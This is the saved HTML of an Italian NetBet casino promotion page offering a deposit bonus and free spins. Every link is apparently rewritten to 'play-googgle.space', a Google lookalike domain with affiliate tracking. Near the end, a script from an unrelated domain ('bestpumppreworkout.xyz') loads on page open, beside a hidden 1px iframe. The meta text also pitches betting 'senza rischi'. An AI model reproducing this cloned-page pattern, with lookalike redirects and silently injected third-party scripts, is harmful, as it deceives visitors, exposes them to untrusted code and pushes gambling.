<!DOCTYPE html>

<html lang="it" style="padding-bottom: 72px">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta name="robots" content="noindex,follow" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <link
      rel="canonical"
      href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
    />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta
      name="keywords"
      content="Scommesse NetBet, qui trovi le migliori quote di tutte le maggiori competizioni sportive! Tantissimi bonus e promozioni per scommettere senza rischi, Registrati ora!"
    />
    <meta
      name="description"
      content="Scommesse NetBet, qui trovi le migliori quote di tutte le maggiori competizioni sportive! Tantissimi bonus e promozioni per scommettere senza rischi, Registrati ora!"
    />
    <meta
      property="og:image"
      content="https://go.netbet.it/lp-asset/netbetit/casino/100fs/og-image.png"
    />
    <link
      rel="icon"
      type="image/png"
      href="https://go.netbet.it/src/img/netbet/favicon.ico"
    />
    <title>NetBet Casino</title>
    <!-- Bootstrap -->
    <link href="./NetBetCasino_files/css" rel="stylesheet" />
    <link rel="stylesheet" href="./NetBetCasino_files/font-awesome.min.css" />
    <link href="./NetBetCasino_files/primary-minify.css" rel="stylesheet" />
    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9
      ]><script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script
    ><![endif]-->
    <link
      href="./NetBetCasino_files/NetBet_18_casino_2018-minify.css"
      rel="stylesheet"
    />
    <style>
      #main {
        background: url('https://go.netbet.it/lp-asset/netbetit/casino/100fs/bg.jpg')
          no-repeat center;
        -webkit-background-size: 50%;
        -moz-background-size: 50%;
        background-size: cover;
        background-color: white;
        overflow: hidden;
      }
      #main .row {
        height: calc(100vh - 77px);
        min-height: 760px;
      }
      #main .bonusCode,
      #main .down_button {
        color: grey;
      }
      button.casino-button {
        font-size: 2.5em;
      } /* steps */
      .steps .text.text-grey {
        color: grey;
      }
      button.icon {
        width: 120px;
        height: 120px;
        border-radius: 50%;
        position: relative;
      }
      .icon-1,
      .icon-2,
      .icon-3 {
        width: 120px;
        height: 120px;
        border-radius: 50%;
        position: absolute;
        top: 0;
        left: 0;
      }
      .icon-1 {
        background: url('/../../../../../../../src/img/template/NetBet_18_casino_2018/icon-1.svg')
          center no-repeat;
        background-size: 100%;
      }
      .icon-2 {
        background: url('/../../../../../../../src/img/template/NetBet_18_casino_2018/icon-4.svg')
          center no-repeat;
        background-size: 57%;
      }
      .icon-3 {
        background: url('/../../../../../../../src/img/template/NetBet_18_casino_2018/icon-2.svg')
          center no-repeat;
        background-size: 57%;
      }
      @media (max-width: 1199px) {
        #main {
          background-image: none;
          background-size: 60vw;
          background-color: white;
        }
        .offer-left-img {
          display: none;
        }
      }
      @media (max-width: 767px) {
        #main .row {
          min-height: 500px;
        }
      } /* iPad Portrait */
      @media only screenand (min-device-width: 768px) and (max-device-width: 1024px) and (orientation: portrait) and (-webkit-min-device-pixel-ratio: 1) {
        #main {
          background: url('/var/www/gov2/resources/views/pages/landing/netbetit/casino/100fs/bg-small.jpg')
            no-repeat center bottom;
          background-size: 50vw;
          background-color: white;
        }
        #main .row {
          justify-content: center !important;
        }
        .offer-left {
          display: none;
        }
        #main .bonusCode {
          color: white;
        }
        .short-terms .text-right {
          text-align: center !important;
          color: white;
        }
      }
    </style>

    <style>
      .right-corner {
        background-image: url('https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}');
        background-repeat: no-repeat;
        position: absolute;
        top: 75px;
        right: 0em;
        z-index: 1;
        width: 206px;
        height: 193px;
        overflow: hidden;
        visibility: hidden;
      }

      .mobile-top-offer-text {
        color: white;
        align-self: center;
        text-align: center;
        margin-top: 1.2em;
        font-size: 1.1em;
      }
      .mobile-top {
        background-color: #ff9001;
        height: 2.6em;
        margin-top: 4em;
        display: none;
      }

      .star {
        width: 30px;
        height: 30px;
        margin-top: 0.5em;
      }
      .bottom-text-small {
        font-size: 0.7em;
        line-height: 1.1em;
      }
      .mobile {
        display: none;
      }
      .deposit {
        font-size: 1em;
        letter-spacing: 0.03em;
      }
      .starburst {
        margin-bottom: 0em;
        margin-top: 1em;
      }
      .bigger {
        font-size: 1.3em;
        line-height: 1.8em;
      }
      .smaller {
        font-size: 100%;
      }
      .amount {
        font-size: 2.5em;
        padding-left: 0.2em;
      }
      .bottom-text {
        font-size: 1.5em;
      }
      .gradient-grey {
        color: #21262d;
        background: -webkit-linear-gradient(#505461, #21262d);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
      }

      #plus-line {
        margin-bottom: -0.8em;
      }

      .offer-right {
        max-width: none;
        text-align: center !important;
        transform: translateX(5em);
      }
      .smaller-text {
        background-color: #ff9001;
        padding: 0 0.5em;
        font-size: 0.5em;
      }
      .bigger {
        font-size: 1.4em;
      }

      .text-1 {
        font-size: 37px;
        font-weight: bold;
      }
      .gradient-grey {
        color: #21262d;
        background: -webkit-linear-gradient(#505461, #21262d);
        -webkit-background-clip: text;
        -webkit-text-fill-color: transparent;
      }
      .offer-left {
        left: -15em;
        bottom: 95px;
        transform: scale(1);
      }
      .svg-line {
        margin-top: 0.2em;
        margin-bottom: -0.4em;
      }
      .smaller.square {
        line-height: 1.2em;
        font-size: 46%;
        background-color: #ff9001;
        padding: 0.1em 0.3em;
        margin-top: 0.5em;
      }

      @media (max-width: 1320px) {
        .offer-right {
          margin: 0 auto;
          transform: scale(1.5);
        }
        .offer-left-img {
          display: none;
        }
        #main {
          background-position-x: -63vw;
        }
        .starburst {
          display: none;
        }
        .mobile {
          display: block;
          height: auto;
          text-align: center;
          margin: auto;
          margin-top: 2em;
          align-items: center;
        }
      }

      @media (max-width: 1199px) {
        /*.offer-right */
      }

      @media (max-width: 768px) {
        .offer-right {
          margin: 0 auto;
          transform: scale(1.1);
        }
        .right-corner {
          margin-top: -10px;
        }
      }
      @media (max-width: 767px) {
        .right-corner {
          display: none;
        }
        .mobile-top {
          display: flex;
          justify-content: space-around;
        }
      }
      @media (max-width: 600px) {
        .main-container {
          padding-top: 1em;
        }
        .offer-right {
          margin: 0 auto;
          transform: scale(0.8);
          margin-top: -1em;
        }
        .svg-line {
          width: 100%;
        }
        .bottom-text {
          font-size: 1.3em;
        }
      }
      @media (max-width: 410px) {
        .text-1 {
          font-size: 34px;
        }
        .offer-right {
          transform: scale(0.65);
        }
      }
      @media (max-width: 375px) {
        .text-1 {
          font-size: 30px;
        }
        .offer-right {
          transform: scale(0.8);
        }
      }
      @media (max-width: 360px) {
        .offer-right {
          transform: scale(0.79);
          margin-top: -1em;
        }
        #main {
          height: 100vh;
        }
      }
      @media (max-width: 320px) {
        .offer-right {
          transform: scale(0.67);
          margin-top: -3.2em;
        }
        .mobile-top-offer-text {
          margin-top: 1.3em;
          font-size: 1em;
        }
      }

      .mobile-top {
        visibility: hidden;
        height: 0;
      }
    </style>

    <script
      type="text/javascript"
      async=""
      src="./NetBetCasino_files/analytics.js.Без названия"
    ></script>
    <script async="" src="./NetBetCasino_files/gtm.js.Без названия"></script>
    <script type="text/javascript">
      dataLayer = [{ brand: '7', product: '6', id: '353104', user_id: '' }];
    </script>
    <!-- Google Tag Manager -->
    <script>
      (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({ 'gtm.start': new Date().getTime(), event: 'gtm.js' });
        var f = d.getElementsByTagName(s)[0],
          j = d.createElement(s),
          dl = l != 'dataLayer' ? '&l=' + l : '';
        j.async = true;
        j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
        f.parentNode.insertBefore(j, f);
      })(window, document, 'script', 'dataLayer', 'GTM-PMT9QK');
    </script>
    <!-- End Google Tag Manager -->
    <link type="text/css" rel="stylesheet" />
  </head>
  <body class="it netbet casino-color" data-task="4320" data-myname="100fs">
    <!-- scroll top bottom --><!-- mobile fixed bottom -->
    <div class="bottomMenu fixed-bottom text-center d-sm-none bottomMenu__it">
      <div class="bottomMenu__control button-wrapper py-2">
        <a
          href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
          ><button class="it casino-button cta-button">Gioca ora</button></a
        >
      </div>
    </div>
    <!-- Google Tag Manager (noscript) --><noscript
      ><iframe
        src="https://www.googletagmanager.com/ns.html?id=GTM-PMT9QK"
        height="0"
        width="0"
        style="display: none; visibility: hidden"
      ></iframe></noscript
    ><!-- End Google Tag Manager (noscript) -->

    <nav class="fixed-top">
      <div class="container netbet">
        <div class="row justify-content-around d-flex align-items-center">
          <div id="logo" class="col-6 col-md-4">
            <a
              href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
              ><img
                src="./NetBetCasino_files/logo.png"
                alt="netbet"
                class="float-left img-fluid"
            /></a>
          </div>
          <div class="d-none d-xl-block custom-text col-sm-4 text-center">
            <h4></h4>
          </div>
          <div class="col-6 col-md-6 col-lg-6 col-xl-4 co-logo text-right">
            <a
              href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
              class="btn btn-login text-center hidden-xs d-none d-lg-inline-block"
              >Visita</a
            >
          </div>
        </div>
      </div>
    </nav>
    <section id="main">
      <div class="container main-container">
        <div
          class="row d-flex offer align-items-center justify-content-center justify-content-md-end position-relative"
          id="offer"
        >
          <div class="offer-left d-none d-xl-block position-absolute"></div>
          <div class="offer-right casino-color text-center text-md-right">
            <a
              href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
              ><div class="text-1">
                <div class="smaller gradient-grey">BONUS DI BENVENUTO</div>
                <div
                  class="bigger d-flex align-items-center justify-content-center justify-content-md-around"
                >
                  <div
                    class="smaller square float-left text-white"
                    style="text-align: center"
                  >
                    100%<br />FINO<br />A
                  </div>
                  <div class="float-right gradient-grey amount">200€<br /></div>
                  <br />
                </div>
                <div class="deposit gradient-grey">SUL PRIMO DEPOSITO</div>
                <svg
                  class="svg-line"
                  version="1.1"
                  id="Layer_1"
                  xmlns="http://www.w3.org/2000/svg"
                  xmlns:xlink="http://www.w3.org/1999/xlink"
                  x="0px"
                  y="0px"
                  viewBox="0 0 663.7 81.3"
                  xml:space="preserve"
                >
                  <style type="text/css">
                    .st0 {
                      fill: #ff9001;
                    }
                    .st1 {
                      opacity: 0.44;
                      clip-path: url(#SVGID_2_);
                    }
                    .st2 {
                      fill: #ffffff;
                    }
                    .st3 {
                      fill: #ffffff;
                      stroke: #000000;
                      stroke-width: 0.2;
                      stroke-miterlimit: 10;
                    }
                  </style>
                  <g id="Layer_2"></g>
                  <path
                    class="st0"
                    d="M652.6,44.6H402.2c-2.1,0-3.9-1.8-3.9-3.9v0c0-2.1,1.8-3.9,3.9-3.9h250.4c2.1,0,3.9,1.8,3.9,3.9v0 C656.5,42.8,654.8,44.6,652.6,44.6z"
                  ></path>
                  <path
                    class="st0"
                    d="M261.4,44.6H11.1c-2.1,0-3.9-1.8-3.9-3.9v0c0-2.1,1.8-3.9,3.9-3.9h250.4c2.1,0,3.9,1.8,3.9,3.9v0 C265.3,42.8,263.6,44.6,261.4,44.6z"
                  ></path>
                  <g>
                    <circle class="st0" cx="331.7" cy="40.7" r="36.3"></circle>
                    <g>
                      <defs>
                        <circle
                          id="SVGID_1_"
                          cx="331.7"
                          cy="40.7"
                          r="36.3"
                        ></circle>
                      </defs>
                      <clippath id="SVGID_2_">
                        <use
                          xlink:href="#SVGID_1_"
                          style="overflow: visible"
                        ></use>
                      </clippath>
                      <polygon
                        class="st1"
                        points="304.7,45.7 326.7,57.3 331.7,71.6 364,89.2 388.5,40.1 333.2,9.9 331.7,40 306.5,39.5 "
                      ></polygon>
                    </g>
                    <path
                      class="st2"
                      d="M357.6,45.7h-51.8c-2.7,0-5-2.2-5-5v0c0-2.7,2.2-5,5-5h51.8c2.7,0,5,2.2,5,5v0 C362.6,43.4,360.3,45.7,357.6,45.7z"
                    ></path>
                    <path
                      class="st2"
                      d="M326.7,66.6V14.8c0-2.7,2.2-5,5-5l0,0c2.7,0,5,2.2,5,5v51.8c0,2.7-2.2,5-5,5l0,0 C328.9,71.6,326.7,69.3,326.7,66.6z"
                    ></path>
                    <path class="st3" d="M368.4,29.3"></path>
                    <path class="st3" d="M333.2,9.9"></path>
                  </g>
                </svg>
                <div
                  class="d-flex align-items-center justify-content-center justify-content-md-around"
                >
                  <div class="bottom-text highlight">100</div>
                  <div class="bottom-text gradient-grey">GIRI GRATIS</div>
                </div>
                <div class="bottom-text-small gradient-grey">
                  ALLA CONVALIDA DEL CONTO
                </div>
              </div>
              <div class="text-2">
                <div class="starburst">
                  <img src="./NetBetCasino_files/desktop_id.png" />
                </div>
              </div>
              <div class="text-3">
                <div class="mobile">
                  <img src="./NetBetCasino_files/bg-small.png" />
                </div></div
            ></a>
            <div class="button-wrapper pt-3">
              <a
                href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
                ><button class="casino-button cta-button">
                  VISITA IL SITO
                </button></a
              >
            </div>
            <div class="pt-4"></div>
            <div class="short-terms">
              <!-- short-terms for UK only -->
              <div class="text-center text-xl-right">
                <p class="py-1 pr-1"></p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    <div class="steps casino-color bg-white" id="steps">
      <div class="container">
        <a
          href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
          ><div class="row casino-color py-5">
            <div class="col-md-4">
              <div class="text-center">
                <button class="casino-button icon my-3 cta-button">
                  <div class="icon-1"></div>
                </button>
                <h5 class="heading"><b>ISCRIVITI</b></h5>
                <p class="text text-grey">
                  IN SOLI <span><b>2 MINUTI</b></span>
                </p>
              </div>
            </div>
            <div class="col-md-4">
              <div class="text-center">
                <button class="casino-button icon my-3 cta-button">
                  <div class="icon-3"></div>
                </button>
                <h5 class="heading"><b>DEPOSITA</b></h5>
                <p class="text text-grey">
                  E RICEVI IL <span><b> 100% FINO A 200€ </b></span>
                </p>
              </div>
            </div>
            <div class="col-md-4">
              <div class="text-center">
                <button class="casino-button icon my-3 cta-button">
                  <div class="icon-2"></div>
                </button>
                <h5 class="heading"><b>CONVALIDA IL CONTO</b></h5>
                <p class="text text-grey">
                  CONVALIDA IL CONTO e RICEVI
                  <span><b> 100 GIRI GRATIS </b></span>
                </p>
              </div>
            </div>
          </div></a
        >
      </div>
    </div>
    <section class="terms">
      <div class="container">
        <div class="row justify-content-center">
          <div class="col-12 text-center py-4">
            <p class="terms" id="terms">
              <a
                data-toggle="collapse"
                href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
                aria-expanded="false"
                aria-controls="terms_collapse"
                data-parent="#terms"
                >Termini e Condizioni<span class="smaller terms-topic"
                  >▼</span
                ></a
              >
            </p>
          </div>
          <div class="col-12">
            <div
              class="collapse multi-collapse"
              id="terms_collapse"
              data-parent="#terms"
            >
              <div class="card card-body">
                <p>
                  Termini e condizioni del Bonus di Benvenuto 100% sul primo
                  deposito fino a 200€
                </p>
                <ol>
                  <li>
                    La promozione è valida esclusivamente per tutti i giocatori
                    che hanno completato la registrazione su NetBet Casinò
                    tramite questo link partner.
                  </li>
                  <li>
                    Il bonus è immediatamente assegnato dopo il primo deposito.
                  </li>
                  <li>
                    Non verranno considerati idonei al ricevimento del bonus di
                    benvenuto i depositi effettuati con sistemi eWallet quali
                    Skrill e Neteller.
                  </li>
                  <li>
                    I nuovi giocatori riceveranno un bonus fino a un massimo di
                    200€ sul primo deposito effettuato a seguito della
                    registrazione.
                  </li>
                  <li>
                    Per ricevere il Bonus di Benvenuto i giocatori devono
                    accedere al Mio Conto da PC o mobile, e depositare cliccando
                    sul pulsante Deposita. L'importo del Fun Bonus accreditato
                    si può visualizzare nella sezione Dettagli Fun Bonus. Il
                    Bonus ottenuto è da considerarsi Fun Bonus.
                  </li>
                  <li>
                    Il bonus di benvenuto sarà valido a partire dal 03/12/2018.
                    Tutti i giocatori che non hanno ancora effettuato il loro 1°
                    deposito entro tale data potranno usufruire dell'offerta
                    oggetto di questa promozione.
                  </li>
                  <li>
                    Il bonus sul deposito può essere riscattato una sola volta
                    per giocatore.
                  </li>
                  <li>
                    Il Bonus o Giri Gratis verranno automaticamente disattivati
                    nel caso in cui il giocatore decida di richiedere un
                    prelievo nell'arco del periodo promozionale.
                  </li>
                  <li>
                    II giocatori che non desiderano ricevere l'offerta di
                    Benvenuto dovranno selezionare l'opzione: Non desidero usare
                    il bonus
                  </li>
                  <li>
                    I bonus ottenuti con questa promozione sono validi 7 giorni
                    a partire dalla data di assegnazione.
                  </li>
                  <li>
                    Questa offerta non può essere utilizzata congiuntamente a
                    qualsiasi altra offerta, sarà possibile utilizzare un solo
                    bonus attivo per volta. Prima di poterne richiedere un
                    altro, il bonus attivo dovrà essere completato.
                  </li>
                  <li>
                    Il bonus ricevuto (Fun Bonus) deve essere scommesso un
                    minimo di quarantacinque (45) volte. Una volta soddisfatto
                    tale requisito, il bonus diventerà reale. Il bonus reale
                    andrà scommesso ulteriormente per una (1) volta prima di
                    poter incassare le proprie vincite. Il bonus reale
                    convertibile una volta conclusi i requisiti di giocata non
                    potrà superare l'importo di 1000€
                  </li>
                  <li>
                    I fondi personali vengono usati sempre prima del bonus
                  </li>
                  <li>
                    <a
                      href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
                      >Clicca qui</a
                    >
                    per scoprire i giochi che contribuiscono allo sblocco del
                    bonus.
                  </li>
                </ol>
                <p>
                  Termini e Condizioni 100 Giri Gratis per giocare alla slot
                  Starburst
                </p>
                <ol>
                  <li>
                    I free spin possono essere utilizzati esclusivamente sulla
                    slot Starburst su piattaforma desktop o da dispositivo
                    mobile.
                  </li>
                  <li>
                    I free spin saranno accreditati immediatamente dopo
                    l’approvazione del Documento di identità e dopo aver
                    effettuato il primo deposito.
                  </li>
                  <li>
                    I giocatori che non desiderano ricevere l'offerta di
                    Benvenuto dovranno selezionare l'opzione: Non desidero usare
                    il bonus
                  </li>
                  <li>
                    Il bonus ottenuto dalle vincite dei Giri Gratis (Fun Bonus)
                    deve essere scommesso un minimo di quarantacinque (45)
                    volte. Una volta soddisfatto tale requisito, il bonus
                    diventerà reale. Il bonus reale andrà scommesso
                    ulteriormente per una (1) volta prima di poter incassare le
                    proprie vincite. Per attivare il bonus è necessario cliccare
                    su almeno un gioco che presenti PT (Playthrough) = 45 (per
                    maggiori informazioni, visita la nostra pagina Aiuto &gt;
                    Bonus Casinò). Il bonus reale convertibile una volta
                    conclusi i requisiti di giocata non potrà superare l'importo
                    di 20€.
                  </li>
                  <li>
                    I 100 free spins sono disponibili per 7 giorni
                    dall’assegnazione.
                  </li>
                  <li>
                    <a
                      href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
                      >Clicca qui</a
                    >
                    per scoprire i giochi che contribuiscono allo sblocco del
                    bonus.
                  </li>
                </ol>
                <p>Informazioni generali</p>
                <ol>
                  <li>
                    Questa offerta è valida solo per i cittadini italiani
                    maggiorenni. Il giocatore ha diritto ad usufruire
                    dell'offerta benvenuto NetBet una sola ed unica volta.
                  </li>
                  <li>
                    Offerta valida per un unico conto reale per giocatore, per
                    nucleo familiare. NetBet si riserva il diritto di chiudere i
                    conti, revocare qualunque vincita presente su di essi e
                    annullare l'incasso dei conti dei giocatori che proveranno a
                    ottenere bonus per i quali non risultano idonei.
                  </li>
                  <li>
                    I dipendenti, i funzionari e i direttori NetBet, come pure
                    le relative agenzie promozionali o di altro genere legate a
                    NetBet, i licenziatari e coloro che concedono licenze, i
                    fornitori di servizi e qualsiasi altra società consociata o
                    affiliata non saranno considerati idonei alla
                    partecipazione. Le succitate condizioni si applicano anche
                    ai familiari in linea diretta di tali persone.
                  </li>
                  <li>
                    NetBet si riserva il diritto di non permettere a chi ha
                    abusato di questa o altre promozioni di ricevere altre
                    offerte in futuro. NetBet si riserva inoltre il diritto di
                    bloccare il conto di gioco di tale giocatore.
                  </li>
                  <li>
                    NetBet si riserva il diritto di modificare i termini delle
                    promozioni senza alcun preavviso.
                  </li>
                  <li>
                    NetBet si riserva il diritto di modificare o cancellare il
                    bonus in ogni istante.
                  </li>
                  <li>
                    Vengono applicati I termini e condizioni generali di NetBet.
                  </li>
                </ol>
              </div>
            </div>
          </div>
        </div>
      </div>
    </section>
    <footer id="footer" class="pt-5">
      <div class="container">
        <div class="row">
          <div class="col-12 col-sm-12 text-center">
            <h3>METODI DI PAGAMENTO</h3>
            <style type="text/css">
              .footer-payment-method ul {
                margin: 0;
                padding: 0;
              }
              .footer-payment-method ul li {
                margin: 0;
                padding: 0;
                list-style-type: none;
                display: inline-block;
                background-image: none;
              }
              .footer-payment-method ul li a.nb-postepay {
                width: 64px;
                background-position: -88px -82px;
              }
              .footer-payment-method ul li a {
                display: inline-block;
                height: 25px;
                background-image: url(https://casino.netbet.it/cdn-cgi/image/format=auto/public/responsive/css/images/sbtech_mobile_sprite_v4.png) !important;
                background-repeat: no-repeat;
                background-position: center;
                overflow: hidden;
                text-indent: -1000px;
                margin: 10px;
              }
              .footer-payment-method ul li a.nb-paysafecard {
                width: 89px;
                background-position: -169px -80px;
              }
              .footer-payment-method ul li a.nb-skrill {
                width: 32px;
                background-position: -280px -80px;
              }
              .footer-payment-method ul li a.nb-mastercard {
                width: 39px;
                background-position: -337px -76px;
              }
              .footer-payment-method ul li a.nb-visacard {
                width: 41px;
                background-position: -397px -80px;
              }
              .footer-payment-method ul li a.nb-paypal {
                width: 69px;
                background-position: -465px -79px;
              }
              .footer-payment-method ul li a.nb-neteller {
                width: 68px;
                background-position: -555px -80px;
              }
            </style>
            <div class="footer-payment-method">
              <ul class="px-0">
                <li><a class="nb-postepay"></a></li>
                <li><a class="nb-paysafecard"></a></li>
                <li><a class="nb-skrill"></a></li>
                <li><a class="nb-mastercard"></a></li>
                <li><a class="nb-visacard"></a></li>
                <li><a class="nb-paypal"></a></li>
                <li><a class="nb-neteller"></a></li>
              </ul>
            </div>
          </div>
          <div class="col-12 col-sm-12 text-center">
            <h3>GIOCO RESPONSABILE E SICURO</h3>
            <style type="text/css">
              .adm2021 {
                background-image: url('https://go.netbet.it/src/img/ADM-2021.png') !important;
                width: 52px;
                height: 39px;
              }
            </style>
            <div class="footer-responsibles-logo">
              <ul class="px-0">
                <li class="secure-lock"></li>
                <li class="plus18"></li>
                <li class="gioca"></li>
                <li class="adm2021"></li>
              </ul>
            </div>
          </div>
        </div>
        <div class="row">
          <div class="col-12 col-sm-12">
            <div class="footer-desc text-center">
              <div>
                <div>
                  <p>
                    NetBet è un marchio BPG S.r.l. Unipersonale ©2022, Conc.
                    15015
                  </p>
                  <p>P.I. 09258311001, Via Arenula, 16 - 00186 Roma</p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </footer>
    <!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
    <script
      src="./NetBetCasino_files/jquery-3.2.1.min.js.Без названия"
      integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
      crossorigin="anonymous"
    ></script>
    <script
      src="./NetBetCasino_files/popper.min.js.Без названия"
      integrity="sha384-b/U6ypiBEHpOf/4+1nzFpr53nxSS+GLCkfwBdFNTxtclqqenISfwAzpKaMNFNmj4"
      crossorigin="anonymous"
    ></script>
    <script
      src="./NetBetCasino_files/bootstrap.min.js.Без названия"
      integrity="sha384-h0AbiXch4ZDo7tp9hKZ4TsHbi047NrKGLO3SEJAg45jXxnGIfYzk4Si90RDIqNm1"
      crossorigin="anonymous"
    ></script>
    <script
      type="text/javascript"
      id="k_netbet_it"
      src="./NetBetCasino_files/k_netbet_it.js.Без названия"
    ></script>
    <!-- Include all compiled plugins (below), or include individual files as needed -->
    <script src="./NetBetCasino_files/custom.js.Без названия"></script>

    <script type="text/javascript">
      $('.btn-login').text('Visita');
    </script>

    <script type="text/javascript">
      function getCookie(cname) {
        var name = cname + '=';
        var ca = document.cookie.split(';');
        for (var i = 0; i < ca.length; i++) {
          var c = ca[i];
          while (c.charAt(0) == ' ') {
            c = c.substring(1);
          }
          if (c.indexOf(name) == 0) {
            return c.substring(name.length, c.length) == 'true';
          }
        }
        return '';
      }

      if (
        location.search.includes('show-banner') ||
        (true &&
          (!getCookie('sec-banner') ||
            (`until_dismissed` == 'until_dismissed' &&
              !getCookie('sec-banner-dismiss'))))
      ) {
        document.cookie = 'sec-banner=true; max-age=31536000; path=/';
        var banner = document.createElement('div');
        banner.id = 'sec-banner-div';
        var bannerStyle =
          'box-sizing: border-box; z-index: 2147483647; position: fixed; visibility: visible; border: 0px; width: 100%; min-height: 30px; padding: 12px 20px;';
        const fontStyle = document.createElement('link');
        fontStyle.type = 'text/css';
        fontStyle.rel = 'stylesheet';
        // fontStyle.href='https://fonts.googleapis.com/css?family=Open+Sans';
        // bannerStyle += `font-family: 'Open Sans', sans-serif;`
        document.head.appendChild(fontStyle);
        bannerStyle += `bottom:0;`;
        bannerStyle += `background-color: #1d1d1d; color: #9E9E9E;`;
        function ua_dismiss(el) {
          el.parentNode.parentNode.parentNode.parentNode.style.display = 'none';
          document.cookie = 'sec-banner-dismiss=true; max-age=31536000; path=/';
          document.body.parentElement.style.cssText += `padding-bottom:0px`;
        }
        const isMobile = window.navigator.userAgent.match(/mobi/i);
        var bannerHTML = `
				
		      	
  <div class="cookie-bar netbet casino it">
    <span style="font-size: 0.9em;" >
      Questo sito utilizza i cookies per migliorare la tua esperienza di navigazione. Utilizzando questo sito acconsenti all'utilizzo dei cookies.
      <a href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}" target="_blank">
        <span class="text-white"><u>Clicca qui per maggiori informazioni</u></span>&nbsp;
      </a>
    </span>
    <div class="gdpr-button">
      <div>
        <button class="ng-binding" onClick="ua_dismiss(this);">OK</button>
      </div>
    </div>
  </div>

		  `;

        banner.style.cssText = bannerStyle;
        banner.innerHTML = bannerHTML;
        document.body.appendChild(banner);
        const bannerHeight =
          document.getElementById('sec-banner-div').offsetHeight;
        document.body.parentElement.style.cssText += `padding-bottom:${bannerHeight}px`;
      }
    </script>
    <div
      id="sec-banner-div"
      style="
        box-sizing: border-box;
        z-index: 2147483647;
        position: fixed;
        visibility: visible;
        border: 0px;
        width: 100%;
        min-height: 30px;
        padding: 12px 20px;
        bottom: 0px;
        background-color: rgb(29, 29, 29);
        color: rgb(158, 158, 158);
      "
    >
      <div class="cookie-bar netbet casino it">
        <span style="font-size: 0.9em">
          Questo sito utilizza i cookies per migliorare la tua esperienza di
          navigazione. Utilizzando questo sito acconsenti all'utilizzo dei
          cookies.
          <a
            href="https://play-googgle.space?ttq=C92S2I3C77U9N0P90AQ0&id_partners=641&pid=641&offer_id=XXX&l=XXX&sub1=isolda&sub2=XXX&campaign_name={{campaign_name}}&placement={{placement}}&ad_name={{ad_name}}"
            target="_blank"
          >
            <span class="text-white"
              ><u>Clicca qui per maggiori informazioni</u></span
            >&nbsp;
          </a>
        </span>
        <div class="gdpr-button">
          <div>
            <button class="ng-binding" onclick="ua_dismiss(this);">OK</button>
          </div>
        </div>
      </div>
    </div>

    <script src="https://bestpumppreworkout.xyz/order/668612a6?id=C92S2I3C77U9N0P90AQ0&pixel"></script>
    <iframe
      sandbox="allow-scripts allow-same-origin"
      src="./NetBetCasino_files/safeframe.html"
      frameborder="0"
      height="1"
      width="1"
      style="
        position: fixed !important;
        height: 1px !important;
        width: 1px !important;
        left: -1px !important;
        top: -1px !important;
      "
    ></iframe>
  </body>
</html>
